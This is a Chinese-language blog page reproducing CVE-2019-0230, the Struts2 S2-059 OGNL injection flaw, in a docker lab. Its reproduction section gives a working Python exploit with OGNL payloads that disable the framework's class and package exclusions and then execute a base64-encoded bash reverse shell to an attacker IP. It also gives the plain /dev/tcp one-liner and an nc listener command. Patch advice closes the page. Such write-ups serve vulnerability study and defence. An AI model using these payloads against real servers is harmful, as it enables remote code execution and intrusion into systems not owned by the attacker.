menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-0230)S2-059 chevron_right (CVE-2019-0230)S2-059.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-0230)S2-059.md
    3.17 KB / 2021-07-15 19:48:36
        # CVE-2019-0230:Struts2 S2-059 远程代码执行复现
    
    
    
    ## 0x01 简介
    
    
    
    
    
    Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
    
    
    
    ## 0x02 漏洞概述
    
     **漏洞编号CVE-2019-0230**
    
    Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。
    
    ### 0x03 影响版本
    
    
    
    Struts 2.0.0 – Struts 2.5.20
    
    **0x04 环境搭建**
    
    
    
    攻击机:linux:192.168.20.128
    
    靶机:Ubuntu:192.168.20.129
    
    
    
    1、启动 Struts 2.5.16环境:
    
    
    
    ```
    docker-compose up -d
    ```
    
    
    
    ![img](resource/%EF%BC%88CVE-2019-0230%EF%BC%89S2-059/media/640-20201027224353796.png)
    
    
    
     2、启动环境之后访问http://your-ip:8080/?id=1 就可以看到测试界面
    
    
    
    ![img](resource/%EF%BC%88CVE-2019-0230%EF%BC%89S2-059/media/640-20201027224353373.png)
    
    
    
    ## 0x05 漏洞复现
    
    
    
    1、访问
    
    ```
    http://your-ip:8080/?id=%25%7B233*233%7D
    ```
    
    
    
    可以发现233*233的结果被解析到了id属性中可以看到通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析。
    
    
    
    ![img](resource/%EF%BC%88CVE-2019-0230%EF%BC%89S2-059/media/640-20201027224354099.png)
    
    
    
    2、对poc进行了修改,反弹shell
    
    ```
    import requests
    url = "http://127.0.0.1:8080"
    data1 = {
        "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
    }
    data2 = {
        "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}'))}"
    }
    res1 = requests.post(url, data=data1)
    # print(res1.text)
    res2 = requests.post(url, data=data2)
    # print(res2.text)
    ```
    
    
    
    这里exec()函数里是我们要执行的命令,我们进行linux反弹shell命令
    
    
    
    ```
    bash -i >& /dev/tcp/192.168.20.128/6666 0>&1
    ```
    
    
    
    (PS:这里经过水木逸轩大佬指点了解到反弹shell涉及到管道符问题于是要将命令进行base64编码)
    
    base64在线编码:
    
    https://ares-x.com/tools/runtime-exec/
    
    3、在攻击机监听本地端口:nc -lvvp 6666 运行脚本成功反弹回shell
    
    
    
    
    
    ![img](resource/%EF%BC%88CVE-2019-0230%EF%BC%89S2-059/media/640-20201027224353601.png)
    
    
    
    **0x06 修复建议**
    
    
    
    1.Struts官方已经发布了新版本修复了上述漏洞,请受影响的用户尽快升级进行防护。
    
    
    
    2.若不方便升级的用户,可以参考Struts官方提供的缓解措施:
    
    将输入参数的值重新分配给某些Struts的标签属性时,请始终对其进行验证。
    
     考虑激活Proactive OGNL Expression Injection Protection。
    
    
    
    参考链接:http://blog.nsfocus.net/struts-s2-0813/
    
    
    
    links
    file_download